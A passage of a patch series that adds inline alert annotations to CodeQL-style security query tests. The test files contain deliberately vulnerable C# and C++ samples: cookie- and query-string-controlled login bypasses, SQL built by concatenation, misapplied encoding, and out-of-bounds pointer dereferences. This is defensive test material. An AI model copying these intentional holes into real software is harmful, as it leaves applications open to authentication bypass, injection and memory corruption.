b/csharp/ql/test/query-tests/Security Features/CWE-807/ConditionalBypass.cs index 7ab297fbb686..40b3806f71f2 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-807/ConditionalBypass.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-807/ConditionalBypass.cs @@ -9,22 +9,22 @@ public void ProcessRequest(HttpContext ctx) { string user = ctx.Request.QueryString["user"]; string password = ctx.Request.QueryString["password"]; - string isAdmin = ctx.Request.QueryString["isAdmin"]; + string isAdmin = ctx.Request.QueryString["isAdmin"]; // $ Source[cs/user-controlled-bypass]=r1 // BAD: login is only executed if isAdmin is false, but isAdmin // is controlled by the user - if (isAdmin == "false") + if (isAdmin == "false") // $ Alert[cs/user-controlled-bypass]=r1 login(user, password); - HttpCookie adminCookie = ctx.Request.Cookies["adminCookie"]; + HttpCookie adminCookie = ctx.Request.Cookies["adminCookie"]; // $ Source[cs/user-controlled-bypass]=r2 $ Source[cs/user-controlled-bypass]=r3 $ Source[cs/user-controlled-bypass]=r4 // BAD: login is only executed if the cookie value is false, but the cookie // is controlled by the user - if (adminCookie.Value.Equals("false")) + if (adminCookie.Value.Equals("false")) // $ Alert[cs/user-controlled-bypass]=r2 login(user, password); // FALSE POSITIVES: both methods are conditionally executed, but they probably // both perform the security-critical action - if (adminCookie.Value == "false") + if (adminCookie.Value == "false") // $ Alert[cs/user-controlled-bypass]=r3 $ Alert[cs/user-controlled-bypass]=r4 { login(user, password); } @@ -39,14 +39,14 @@ public void ProcessRequest(HttpContext ctx) // BAD: DNS may be controlled by the user IPAddress hostIPAddress = IPAddress.Parse("1.2.3.4"); - IPHostEntry hostInfo = Dns.GetHostByAddress(hostIPAddress); + IPHostEntry hostInfo = Dns.GetHostByAddress(hostIPAddress); // $ Source[cs/user-controlled-bypass]=r5 $ Source[cs/user-controlled-bypass]=r6 // Exact comparison - if (hostInfo.HostName == "trustme.com") + if (hostInfo.HostName == "trustme.com") // $ Alert[cs/user-controlled-bypass]=r5 { login(user, password); } // Substring comparison - if (hostInfo.HostName.EndsWith("trustme.com")) + if (hostInfo.HostName.EndsWith("trustme.com")) // $ Alert[cs/user-controlled-bypass]=r6 { login(user, password); } @@ -67,9 +67,9 @@ public static void Test(HttpContext ctx, String user, String password) public static void Test2(HttpContext ctx, String user, String password) { - HttpCookie adminCookie = ctx.Request.Cookies["adminCookie"]; + HttpCookie adminCookie = ctx.Request.Cookies["adminCookie"]; // $ Source[cs/user-controlled-bypass]=r7 // BAD: login may happen once or twice - if (adminCookie.Value == "false") + if (adminCookie.Value == "false") // $ Alert[cs/user-controlled-bypass]=r7 login(user, password); else { @@ -80,8 +80,8 @@ public static void Test2(HttpContext ctx, String user, String password) public static void Test3(HttpContext ctx, String user, String password) { - HttpCookie adminCookie = ctx.Request.Cookies["adminCookie"]; - if (adminCookie.Value == "false") + HttpCookie adminCookie = ctx.Request.Cookies["adminCookie"]; // $ Source[cs/user-controlled-bypass]=r8 + if (adminCookie.Value == "false") // $ Alert[cs/user-controlled-bypass]=r8 login(user, password); else { diff --git a/csharp/ql/test/query-tests/Security Features/CWE-807/ConditionalBypass.qlref b/csharp/ql/test/query-tests/Security Features/CWE-807/ConditionalBypass.qlref index b0c208da3481..fe01c7557afa 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-807/ConditionalBypass.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-807/ConditionalBypass.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-807/ConditionalBypass.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-838/HtmlEncode.cs b/csharp/ql/test/query-tests/Security Features/CWE-838/HtmlEncode.cs index 8a5e378c8d13..66ad8fb4c1a4 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-838/HtmlEncode.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-838/HtmlEncode.cs @@ -7,7 +7,7 @@ public class HtmlEncode public static void Bad(HttpContext ctx) { var user = WebUtility.UrlDecode(ctx.Request.QueryString["user"]); - ctx.Response.Write("Hello, " + WebUtility.UrlEncode(user)); + ctx.Response.Write("Hello, " + WebUtility.UrlEncode(user)); // $ Alert[cs/inappropriate-encoding]=r1 $ Alert[cs/inappropriate-encoding]=r1 } public static void Good(HttpContext ctx) diff --git a/csharp/ql/test/query-tests/Security Features/CWE-838/InappropriateEncoding.cs b/csharp/ql/test/query-tests/Security Features/CWE-838/InappropriateEncoding.cs index 637988ddc84d..5a9bfd554965 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-838/InappropriateEncoding.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-838/InappropriateEncoding.cs @@ -10,12 +10,12 @@ public class InappropriateEncoding { public void Sql(string value) { - var encodedValue = Encode(value); + var encodedValue = Encode(value); // $ Source[cs/inappropriate-encoding]=r2 using (var connection = new SqlConnection("")) { var query1 = "SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='" + encodedValue + "' ORDER BY PRICE"; // BAD - var adapter = new SqlDataAdapter(query1, connection); + var adapter = new SqlDataAdapter(query1, connection); // $ Alert[cs/inappropriate-encoding]=r2 $ Alert[cs/inappropriate-encoding]=r3 var query2 = "SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=@category ORDER BY PRICE"; // GOOD @@ -28,13 +28,13 @@ public void Sql(string value) public void Html(string value, Label label, System.Windows.Forms.HtmlElement html) { // BAD - label.Text = Encode(value); - label.Text = HttpUtility.UrlEncode(value); - label.Text = HttpUtility.UrlEncode(HttpUtility.HtmlEncode(value)); - var encodedValue = HttpUtility.UrlEncode(value); - html.SetAttribute("a", encodedValue); - label.Text = ""; - label.Text = string.Format("", encodedValue); + label.Text = Encode(value); // $ Alert[cs/inappropriate-encoding]=r4 $ Alert[cs/inappropriate-encoding]=r4 + label.Text = HttpUtility.UrlEncode(value); // $ Alert[cs/inappropriate-encoding]=r5 $ Alert[cs/inappropriate-encoding]=r5 + label.Text = HttpUtility.UrlEncode(HttpUtility.HtmlEncode(value)); // $ Alert[cs/inappropriate-encoding]=r6 $ Alert[cs/inappropriate-encoding]=r6 + var encodedValue = HttpUtility.UrlEncode(value); // $ Source[cs/inappropriate-encoding]=r7 $ Source[cs/inappropriate-encoding]=r8 $ Source[cs/inappropriate-encoding]=r9 + html.SetAttribute("a", encodedValue); // $ Alert[cs/inappropriate-encoding]=r7 + label.Text = ""; // $ Alert[cs/inappropriate-encoding]=r8 + label.Text = string.Format("", encodedValue); // $ Alert[cs/inappropriate-encoding]=r9 // GOOD label.Text = HttpUtility.HtmlEncode(value); @@ -52,8 +52,8 @@ public void Html(string value, Label label, System.Windows.Forms.HtmlElement htm public void Url(string value, HttpServerUtility util, HttpContext ctx) { // BAD - var encodedValue = HttpUtility.HtmlEncode(value); - ctx.Response.Redirect(encodedValue); + var encodedValue = HttpUtility.HtmlEncode(value); // $ Source[cs/inappropriate-encoding]=r10 + ctx.Response.Redirect(encodedValue); // $ Alert[cs/inappropriate-encoding]=r10 // GOOD ctx.Response.Redirect(HttpUtility.UrlEncode(encodedValue)); @@ -63,6 +63,6 @@ public void Url(string value, HttpServerUtility util, HttpContext ctx) static string Encode(string value) { - return value.Replace("\"", "\\\""); + return value.Replace("\"", "\\\""); // $ Source[cs/inappropriate-encoding]=r3 } } diff --git a/csharp/ql/test/query-tests/Security Features/CWE-838/InappropriateEncoding.qlref b/csharp/ql/test/query-tests/Security Features/CWE-838/InappropriateEncoding.qlref index d70d82f47195..99348351479a 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-838/InappropriateEncoding.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-838/InappropriateEncoding.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-838/InappropriateEncoding.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-838/SqlEncode.cs b/csharp/ql/test/query-tests/Security Features/CWE-838/SqlEncode.cs index dd3731cb1613..1e55ade7a9de 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-838/SqlEncode.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-838/SqlEncode.cs @@ -11,8 +11,8 @@ public static DataSet Bad(HttpContext ctx) var user = WebUtility.UrlDecode(ctx.Request.QueryString["user"]); using (var connection = new SqlConnection("")) { - var query = "select * from Users where Name='" + user.Replace("\"", "\"\"") + "'"; - var adapter = new SqlDataAdapter(query, connection); + var query = "select * from Users where Name='" + user.Replace("\"", "\"\"") + "'"; // $ Source[cs/inappropriate-encoding]=r11 + var adapter = new SqlDataAdapter(query, connection); // $ Alert[cs/inappropriate-encoding]=r11 var result = new DataSet(); adapter.Fill(result); return result; diff --git a/csharp/ql/test/query-tests/Security Features/CWE-838/UrlEncode.cs b/csharp/ql/test/query-tests/Security Features/CWE-838/UrlEncode.cs index c43ec2b675a8..303a807a577d 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-838/UrlEncode.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-838/UrlEncode.cs @@ -7,7 +7,7 @@ public class UrlEncode public static void Bad(string value, HttpContext ctx) { var user = WebUtility.UrlDecode(ctx.Request.QueryString["user"]); - ctx.Response.Redirect("?param=" + WebUtility.HtmlEncode(user)); + ctx.Response.Redirect("?param=" + WebUtility.HtmlEncode(user)); // $ Alert[cs/inappropriate-encoding]=r12 $ Alert[cs/inappropriate-encoding]=r12 } public static void Good(string value, HttpContext ctx) From 1d5f8e3254f290f49f2a888563d82dad0b175c1a Mon Sep 17 00:00:00 2001 From: "copilot-swe-agent[bot]" <198982749+Copilot@users.noreply.github.com> Date: Thu, 11 Jun 2026 21:40:42 +0000 Subject: [PATCH 12/15] Convert C++ qlref tests to inline expectations --- .../UnsafeUseOfThis/UnsafeUseOfThis.qlref | 1 + .../Critical/UnsafeUseOfThis/test.cpp | 16 +-- ...UncheckedReturnValueForTimeFunctions.qlref | 1 + .../test.cpp | 12 +- .../CWE/CWE-193/InvalidPointerDeref.qlref | 1 + .../query-tests/Security/CWE/CWE-193/test.cpp | 112 +++++++++--------- 6 files changed, 73 insertions(+), 70 deletions(-) diff --git a/cpp/ql/test/query-tests/Critical/UnsafeUseOfThis/UnsafeUseOfThis.qlref b/cpp/ql/test/query-tests/Critical/UnsafeUseOfThis/UnsafeUseOfThis.qlref index 9c104719c2c0..1bd76706524d 100644 --- a/cpp/ql/test/query-tests/Critical/UnsafeUseOfThis/UnsafeUseOfThis.qlref +++ b/cpp/ql/test/query-tests/Critical/UnsafeUseOfThis/UnsafeUseOfThis.qlref @@ -1 +1,2 @@ query: Likely Bugs/OO/UnsafeUseOfThis.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Critical/UnsafeUseOfThis/test.cpp b/cpp/ql/test/query-tests/Critical/UnsafeUseOfThis/test.cpp index 900418b20ea8..d74cbd39b486 100644 --- a/cpp/ql/test/query-tests/Critical/UnsafeUseOfThis/test.cpp +++ b/cpp/ql/test/query-tests/Critical/UnsafeUseOfThis/test.cpp @@ -4,35 +4,35 @@ struct B; void call_f(B*); struct B : public A { - B() { + B() { // $ Source[cpp/unsafe-use-of-this]=r4 call_f(this); } B(B& b) { - b.f(); // BAD: undefined behavior + b.f(); // BAD: undefined behavior // $ Alert[cpp/unsafe-use-of-this]=r1 } - ~B() { - f(); // BAD: undefined behavior + ~B() { // $ Source[cpp/unsafe-use-of-this]=r2 + f(); // BAD: undefined behavior // $ Alert[cpp/unsafe-use-of-this]=r2 } }; struct C : public B { - C(bool b) { + C(bool b) { // $ Source[cpp/unsafe-use-of-this]=r3 Source[cpp/unsafe-use-of-this]=r5 call_f(this); if(b) { - this->f(); // BAD: undefined behavior + this->f(); // BAD: undefined behavior // $ Alert[cpp/unsafe-use-of-this]=r3 } } }; struct D : public B { - D() : B(*this) {} + D() : B(*this) {} // $ Source[cpp/unsafe-use-of-this]=r1 }; void call_f(B* x) { - x->f(); // 2 x BAD: Undefined behavior + x->f(); // 2 x BAD: Undefined behavior // $ Alert[cpp/unsafe-use-of-this]=r4 Alert[cpp/unsafe-use-of-this]=r5 } struct E : public A { diff --git a/cpp/ql/test/query-tests/Likely Bugs/Leap Year/UncheckedLeapYearAfterYearModification/UncheckedReturnValueForTimeFunctions.qlref b/cpp/ql/test/query-tests/Likely Bugs/Leap Year/UncheckedLeapYearAfterYearModification/UncheckedReturnValueForTimeFunctions.qlref index d453e0c83be4..8dfe8a5c1e1e 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Leap Year/UncheckedLeapYearAfterYearModification/UncheckedReturnValueForTimeFunctions.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Leap Year/UncheckedLeapYearAfterYearModification/UncheckedReturnValueForTimeFunctions.qlref @@ -1 +1,2 @@ query: Likely Bugs/Leap Year/UncheckedReturnValueForTimeFunctions.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Leap Year/UncheckedLeapYearAfterYearModification/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Leap Year/UncheckedLeapYearAfterYearModification/test.cpp index 6e0320e8d84d..7a0b176f8bf9 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Leap Year/UncheckedLeapYearAfterYearModification/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Leap Year/UncheckedLeapYearAfterYearModification/test.cpp @@ -422,7 +422,7 @@ void AntiPattern_unchecked_filetime_conversion2a() st.wYear += 2; // $ Alert[cpp/leap-year/unchecked-after-arithmetic-year-modification] // BUG - UncheckedReturnValueForTimeFunctions - SystemTimeToFileTime(&st, &ft); + SystemTimeToFileTime(&st, &ft); // $ Alert[cpp/leap-year/unchecked-return-value-for-time-conversion-function] } /** @@ -440,7 +440,7 @@ void AntiPattern_unchecked_filetime_conversion2b() st.wYear++; // $ Alert[cpp/leap-year/unchecked-after-arithmetic-year-modification] // BUG - UncheckedReturnValueForTimeFunctions - SystemTimeToFileTime(&st, &ft); + SystemTimeToFileTime(&st, &ft); // $ Alert[cpp/leap-year/unchecked-return-value-for-time-conversion-function] } /** @@ -456,7 +456,7 @@ void AntiPattern_unchecked_filetime_conversion2b(SYSTEMTIME* st) st->wYear++; // $ Alert[cpp/leap-year/unchecked-after-arithmetic-year-modification] // BUG - UncheckedReturnValueForTimeFunctions - SystemTimeToFileTime(st, &ft); + SystemTimeToFileTime(st, &ft); // $ Alert[cpp/leap-year/unchecked-return-value-for-time-conversion-function] } /** @@ -950,7 +950,7 @@ void tp_intermediaryVar(struct timespec now, struct logtime ×tamp_remote) // BUG - UncheckedLeapYearAfterYearModification st.wYear = st.wYear + 1; // $ Alert[cpp/leap-year/unchecked-after-arithmetic-year-modification] - SystemTimeToFileTime(&st, &ft); + SystemTimeToFileTime(&st, &ft); // $ Alert[cpp/leap-year/unchecked-return-value-for-time-conversion-function] } /** @@ -968,7 +968,7 @@ void tp_intermediaryVar(struct timespec now, struct logtime ×tamp_remote) // BUG - UncheckedLeapYearAfterYearModification st.wYear++; // $ Alert[cpp/leap-year/unchecked-after-arithmetic-year-modification] - SystemTimeToFileTime(&st, &ft); + SystemTimeToFileTime(&st, &ft); // $ Alert[cpp/leap-year/unchecked-return-value-for-time-conversion-function] } /** @@ -1032,7 +1032,7 @@ void fp_daymonth_guard(){ st.wDay = st.wMonth == 2 && st.wDay == 29 ? 28 : st.wDay; - SystemTimeToFileTime(&st, &ft); + SystemTimeToFileTime(&st, &ft); // $ Alert[cpp/leap-year/unchecked-return-value-for-time-conversion-function] } void increment_arg(WORD &x){ diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-193/InvalidPointerDeref.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-193/InvalidPointerDeref.qlref index 75e8699aaac2..d252615f6827 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-193/InvalidPointerDeref.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-193/InvalidPointerDeref.qlref @@ -1 +1,2 @@ query: Security/CWE/CWE-193/InvalidPointerDeref.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-193/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-193/test.cpp index db1017e233fe..f26d67738223 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-193/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-193/test.cpp @@ -1,11 +1,11 @@ using size_t = decltype(sizeof 0); void* malloc(size_t size); void test1(int size) { - char* p = (char*)malloc(size); + char* p = (char*)malloc(size); // $ Source[cpp/invalid-pointer-deref]=r1 Source[cpp/invalid-pointer-deref]=r2 char* q = p + size; // $ alloc=L4 - char a = *q; // $ deref=L5->L6 // BAD + char a = *q; // $ deref=L5->L6 Alert[cpp/invalid-pointer-deref]=r1 // BAD char b = *(q - 1); // GOOD - char c = *(q + 1); // $ deref=L5->L8+1 // BAD + char c = *(q + 1); // $ deref=L5->L8+1 Alert[cpp/invalid-pointer-deref]=r2 // BAD char d = *(q + size); // BAD [NOT DETECTED] char e = *(q - size); // GOOD char f = *(q + size + 1); // BAD [NOT DETECTED] @@ -13,11 +13,11 @@ void test1(int size) { } void test2(int size) { - char* p = (char*)malloc(size); + char* p = (char*)malloc(size); // $ Source[cpp/invalid-pointer-deref]=r3 char* q = p + size - 1; // $ alloc=L16 char a = *q; // GOOD char b = *(q - 1); // GOOD - char c = *(q + 1); // $ deref=L17->L20 // BAD + char c = *(q + 1); // $ deref=L17->L20 Alert[cpp/invalid-pointer-deref]=r3 // BAD char d = *(q + size); // BAD [NOT DETECTED] char e = *(q - size); // GOOD char f = *(q + size + 1); // BAD [NOT DETECTED] @@ -25,11 +25,11 @@ void test2(int size) { } void test3(int size) { - char* p = (char*)malloc(size + 1); + char* p = (char*)malloc(size + 1); // $ Source[cpp/invalid-pointer-deref]=r4 Source[cpp/invalid-pointer-deref]=r5 char* q = p + (size + 1); // $ alloc=L28+1 - char a = *q; // $ deref=L29->L30 // BAD + char a = *q; // $ deref=L29->L30 Alert[cpp/invalid-pointer-deref]=r4 // BAD char b = *(q - 1); // GOOD - char c = *(q + 1); // $ deref=L29->L32+1 // BAD + char c = *(q + 1); // $ deref=L29->L32+1 Alert[cpp/invalid-pointer-deref]=r5 // BAD char d = *(q + size); // BAD [NOT DETECTED] char e = *(q - size); // GOOD char f = *(q + size + 1); // BAD [NOT DETECTED] @@ -49,7 +49,7 @@ void test4(int size) { } char* mk_array(int size, char** end) { - char* begin = (char*)malloc(size); + char* begin = (char*)malloc(size); // $ Source[cpp/invalid-pointer-deref]=r6 *end = begin + size; // $ alloc=L52 return begin; @@ -64,7 +64,7 @@ void test5(int size) { } for (char* p = begin; p <= end; ++p) { - *p = 0; // $ deref=L53->L62->L67 deref=L53->L66->L67 // BAD + *p = 0; // $ deref=L53->L62->L67 deref=L53->L66->L67 Alert[cpp/invalid-pointer-deref]=r6 // BAD } for (char* p = begin; p < end; ++p) { @@ -202,7 +202,7 @@ void test12(unsigned len, unsigned index) { } void test13(unsigned len, unsigned index) { - char* p = (char *)malloc(len); + char* p = (char *)malloc(len); // $ Source[cpp/invalid-pointer-deref]=r7 char* end = p + len; // $ alloc=L205 char* q = p + index; @@ -210,7 +210,7 @@ void test13(unsigned len, unsigned index) { return; } - *q = '\0'; // $ deref=L206->L213 // BAD + *q = '\0'; // $ deref=L206->L213 Alert[cpp/invalid-pointer-deref]=r7 // BAD } bool unknown(); @@ -257,21 +257,21 @@ void test17(unsigned *p, unsigned x, unsigned k) { void test17(unsigned len) { - int *xs = new int[len]; + int *xs = new int[len]; // $ Source[cpp/invalid-pointer-deref]=r8 int *end = xs + len; // $ alloc=L260 for (int *x = xs; x <= end; x++) { - int i = *x; // $ deref=L261->L264 // BAD + int i = *x; // $ deref=L261->L264 Alert[cpp/invalid-pointer-deref]=r8 // BAD } } void test18(unsigned len) { - int *xs = new int[len]; + int *xs = new int[len]; // $ Source[cpp/invalid-pointer-deref]=r9 int *end = xs + len; // $ alloc=L270 for (int *x = xs; x <= end; x++) { - *x = 0; // $ deref=L271->L274 // BAD + *x = 0; // $ deref=L271->L274 Alert[cpp/invalid-pointer-deref]=r9 // BAD } } @@ -352,11 +352,11 @@ void test24(unsigned size) { } void test25(unsigned size) { - char *xs = new char[size]; + char *xs = new char[size]; // $ Source[cpp/invalid-pointer-deref]=r10 Source[cpp/invalid-pointer-deref]=r11 char *end = xs + size; // $ alloc=L355 char *end_plus_one = end + 1; - int val1 = *end_plus_one; // $ deref=L356->L358+1 // BAD - int val2 = *(end_plus_one + 1); // $ deref=L356->L359+2 // BAD + int val1 = *end_plus_one; // $ deref=L356->L358+1 Alert[cpp/invalid-pointer-deref]=r10 // BAD + int val2 = *(end_plus_one + 1); // $ deref=L356->L359+2 Alert[cpp/invalid-pointer-deref]=r11 // BAD } void test26(unsigned size) { @@ -374,14 +374,14 @@ void test26(unsigned size) { } void test27(unsigned size, bool b) { - char *xs = new char[size]; + char *xs = new char[size]; // $ Source[cpp/invalid-pointer-deref]=r12 char *end = xs + size; // $ alloc=L377 if (b) { end++; } - int val = *end; // $ deref=L378->L384+1 // BAD + int val = *end; // $ deref=L378->L384+1 Alert[cpp/invalid-pointer-deref]=r12 // BAD } void test28(unsigned size) { @@ -407,47 +407,47 @@ void test28_simple(unsigned size) { } void test28_simple2(unsigned size) { - char *xs = new char[size]; + char *xs = new char[size]; // $ Source[cpp/invalid-pointer-deref]=r13 char *end = &xs[size]; // $ alloc=L410 if (xs < end) { xs++; if (xs < end + 1) { - xs[0] = 0; // $ deref=L411->L415 // BAD + xs[0] = 0; // $ deref=L411->L415 Alert[cpp/invalid-pointer-deref]=r13 // BAD } } } void test28_simple3(unsigned size) { - char *xs = new char[size]; + char *xs = new char[size]; // $ Source[cpp/invalid-pointer-deref]=r14 char *end = &xs[size]; // $ alloc=L421 if (xs < end) { xs++; if (xs - 1 < end) { - xs[0] = 0; // $ deref=L422->L426 // BAD + xs[0] = 0; // $ deref=L422->L426 Alert[cpp/invalid-pointer-deref]=r14 // BAD } } } void test28_simple4(unsigned size) { - char *xs = new char[size]; + char *xs = new char[size]; // $ Source[cpp/invalid-pointer-deref]=r15 char *end = &xs[size]; // $ alloc=L432 if (xs < end) { end++; xs++; if (xs < end) { - xs[0] = 0; // $ deref=L433->L438 // BAD + xs[0] = 0; // $ deref=L433->L438 Alert[cpp/invalid-pointer-deref]=r15 // BAD } } } void test28_simple5(unsigned size) { - char *xs = new char[size]; + char *xs = new char[size]; // $ Source[cpp/invalid-pointer-deref]=r16 char *end = &xs[size]; // $ alloc=L444 end++; if (xs < end) { xs++; if (xs < end) { - xs[0] = 0; // $ deref=L445->L450 // BAD + xs[0] = 0; // $ deref=L445->L450 Alert[cpp/invalid-pointer-deref]=r16 // BAD } } } @@ -477,13 +477,13 @@ void test28_simple7(unsigned size) { } void test28_simple8(unsigned size) { - char *xs = new char[size]; + char *xs = new char[size]; // $ Source[cpp/invalid-pointer-deref]=r17 char *end = &xs[size]; // $ alloc=L480 end += 500; if (xs < end) { xs++; if (xs < end - 1) { - xs[0] = 0; // $ deref=L481->L486+498 // BAD + xs[0] = 0; // $ deref=L481->L486+498 Alert[cpp/invalid-pointer-deref]=r17 // BAD } } } @@ -540,23 +540,23 @@ void test31_simple1(unsigned size, unsigned src_pos) void test31_simple2(unsigned size, unsigned src_pos) { - char *xs = new char[size]; + char *xs = new char[size]; // $ Source[cpp/invalid-pointer-deref]=r18 if (src_pos > size) { src_pos = size; } if (src_pos < size + 1) { - xs[src_pos] = 0; // $ alloc=L543 deref=L548 // BAD + xs[src_pos] = 0; // $ alloc=L543 deref=L548 Alert[cpp/invalid-pointer-deref]=r18 // BAD } } void test31_simple3(unsigned size, unsigned src_pos) { - char *xs = new char[size]; + char *xs = new char[size]; // $ Source[cpp/invalid-pointer-deref]=r19 if (src_pos > size) { src_pos = size; } if (src_pos - 1 < size) { - xs[src_pos] = 0; // $ alloc=L554 deref=L559 // BAD + xs[src_pos] = 0; // $ alloc=L554 deref=L559 Alert[cpp/invalid-pointer-deref]=r19 // BAD } } @@ -639,12 +639,12 @@ void test31_simple5_plus1(unsigned size, unsigned src_pos) void test31_simple1_sub1(unsigned size, unsigned src_pos) { - char *xs = new char[size - 1]; + char *xs = new char[size - 1]; // $ Source[cpp/invalid-pointer-deref]=r20 if (src_pos > size) { src_pos = size; } if (src_pos < size) { - xs[src_pos] = 0; // $ alloc=L642-1 deref=L647 // BAD + xs[src_pos] = 0; // $ alloc=L642-1 deref=L647 Alert[cpp/invalid-pointer-deref]=r20 // BAD } } @@ -727,10 +727,10 @@ void test21_simple(bool b) { } void test36(unsigned size, unsigned n) { - int* p = new int[size + 2]; + int* p = new int[size + 2]; // $ Source[cpp/invalid-pointer-deref]=r21 if(n < size + 1) { int* end = p + (n + 2); // $ alloc=L730+2 - *end = 0; // $ deref=L732->L733 // BAD + *end = 0; // $ deref=L732->L733 Alert[cpp/invalid-pointer-deref]=r21 // BAD } } @@ -751,7 +751,7 @@ void error(const char * msg) { } void test38(unsigned size) { - char * alloc = new char[size]; + char * alloc = new char[size]; // $ Source[cpp/invalid-pointer-deref]=r22 Source[cpp/invalid-pointer-deref]=r23 Source[cpp/invalid-pointer-deref]=r24 Source[cpp/invalid-pointer-deref]=r25 unsigned pos = 0; while (pos < size) { @@ -764,12 +764,12 @@ void test38(unsigned size) { case '0': if (n != 1) error(""); - char x = alloc[pos + 1]; // $ alloc=L754 deref=L767 // GOOD [FALSE POSITIVE] + char x = alloc[pos + 1]; // $ alloc=L754 deref=L767 Alert[cpp/invalid-pointer-deref]=r22 Alert[cpp/invalid-pointer-deref]=r23 // GOOD [FALSE POSITIVE] break; case '1': if (n != 2) error(""); - char a = alloc[pos + 1]; // $ alloc=L754 deref=L772 // GOOD [FALSE POSITIVE] + char a = alloc[pos + 1]; // $ alloc=L754 deref=L772 Alert[cpp/invalid-pointer-deref]=r24 Alert[cpp/invalid-pointer-deref]=r25 // GOOD [FALSE POSITIVE] char b = alloc[pos + 2]; break; } @@ -778,19 +778,19 @@ void test38(unsigned size) { } void test38_simple(unsigned size, unsigned pos, unsigned numParams) { - char * p = new char[size]; + char * p = new char[size]; // $ Source[cpp/invalid-pointer-deref]=r26 if (pos < size) { if (pos + numParams < size) { if (numParams == 1) { - char x = p[pos + 1]; // $ alloc=L781 deref=L786 // GOOD [FALSE POSITIVE] + char x = p[pos + 1]; // $ alloc=L781 deref=L786 Alert[cpp/invalid-pointer-deref]=r26 // GOOD [FALSE POSITIVE] } } } } void mk_array_no_field_flow(int size, char** begin, char** end) { - *begin = (char*)malloc(size); + *begin = (char*)malloc(size); // $ Source[cpp/invalid-pointer-deref]=r27 Source[cpp/invalid-pointer-deref]=r28 *end = *begin + size; // $ alloc=L793 } @@ -804,7 +804,7 @@ void test6_no_field_flow(int size) { } for (char* p = begin; p <= end; ++p) { - *p = 0; // $ deref=L794->L802->L807 deref=L794->L806->L807 // BAD + *p = 0; // $ deref=L794->L802->L807 deref=L794->L806->L807 Alert[cpp/invalid-pointer-deref]=r27 // BAD } for (char* p = begin; p < end; ++p) { @@ -818,7 +818,7 @@ void test7_callee_no_field_flow(char* begin, char* end) { } for (char* p = begin; p <= end; ++p) { - *p = 0; // $ deref=L794->L815->L821 deref=L794->L816->L821 deref=L794->L820->L821 // BAD + *p = 0; // $ deref=L794->L815->L821 deref=L794->L816->L821 deref=L794->L820->L821 Alert[cpp/invalid-pointer-deref]=r28 // BAD } for (char* p = begin; p < end; ++p) { @@ -838,26 +838,26 @@ void test15_with_malloc(size_t index) { if(size < index) { return; } - int* newname = (int*)malloc(size); - newname[index] = 0; // $ SPURIOUS: alloc=L841 deref=L842 // GOOD [FALSE POSITIVE] + int* newname = (int*)malloc(size); // $ Source[cpp/invalid-pointer-deref]=r29 + newname[index] = 0; // $ SPURIOUS: alloc=L841 deref=L842 Alert[cpp/invalid-pointer-deref]=r29 // GOOD [FALSE POSITIVE] } void test16_with_malloc(size_t index) { size_t size = index + 13; if(size >= index) { - int* newname = (int*)malloc(size); - newname[index] = 0; // $ SPURIOUS: alloc=L848 deref=L849 // GOOD [FALSE POSITIVE] + int* newname = (int*)malloc(size); // $ Source[cpp/invalid-pointer-deref]=r30 + newname[index] = 0; // $ SPURIOUS: alloc=L848 deref=L849 Alert[cpp/invalid-pointer-deref]=r30 // GOOD [FALSE POSITIVE] } } # define MyMalloc(size) malloc(((size) == 0 ? 1 : (size))) void test_regression(size_t size) { - int* p = (int*)MyMalloc(size + 1); + int* p = (int*)MyMalloc(size + 1); // $ Source[cpp/invalid-pointer-deref]=r31 int* chend = p + (size + 1); // $ alloc=L856+1 if(p <= chend) { - *p = 42; // $ deref=L857->L860 // BAD + *p = 42; // $ deref=L857->L860 Alert[cpp/invalid-pointer-deref]=r31 // BAD } } @@ -865,7 +865,7 @@ void test_regression(size_t size) { void* g_malloc(size_t size); void test17(int size) { - char* p = (char*)g_malloc(size); + char* p = (char*)g_malloc(size); // $ Source[cpp/invalid-pointer-deref]=r32 char* q = p + size; // $ alloc=L868 - char a = *q; // $ deref=L869->L870 // BAD -} \ No newline at end of file + char a = *q; // $ deref=L869->L870 Alert[cpp/invalid-pointer-deref]=r32 // BAD +} From 93898f5ee1c9d09b73317bef3655ba6d2724f9c8 Mon Sep 17 00:00:00 2001 From: "copilot-swe-agent[bot]" 